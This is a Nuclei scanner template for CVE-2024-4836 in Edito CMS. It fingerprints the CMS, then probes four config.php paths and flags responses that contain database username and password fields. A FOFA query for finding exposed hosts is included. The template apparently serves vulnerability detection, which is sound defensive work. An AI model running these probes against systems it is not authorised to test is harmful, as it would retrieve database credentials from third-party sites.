id: CVE-2024-4836

info:
  name: Edito CMS - Sensitive Data Leak
  author: securityforeveryone
  severity: high
  description: |
    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
  reference:
    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
    - https://github.com/sleep46/CVE-2024-4836_Check
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
  metadata:
    max-request: 5
    fofa-query: icon_hash="1491301339"
  tags: cve,cve2024,cms,edito,info-leak

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
          - 'status_code==200'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/config.php"
      - "{{BaseURL}}/config/config.php"
      - "{{BaseURL}}/include/config.php"
      - "{{BaseURL}}/includes/config.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"db_password", "db_username")'
          - 'status_code==200'
        condition: and
# digest: 4b0a00483046022100b7a10b83a25f29c5859758a83f69247591dea7ed398df4fde6d1e13bc1b6b902022100ad967c69511089521f1cf12acb05e192a2852346c6cc9b7cb96fe6f8cea4aa02:922c64590222798bb761d5b6d8e72950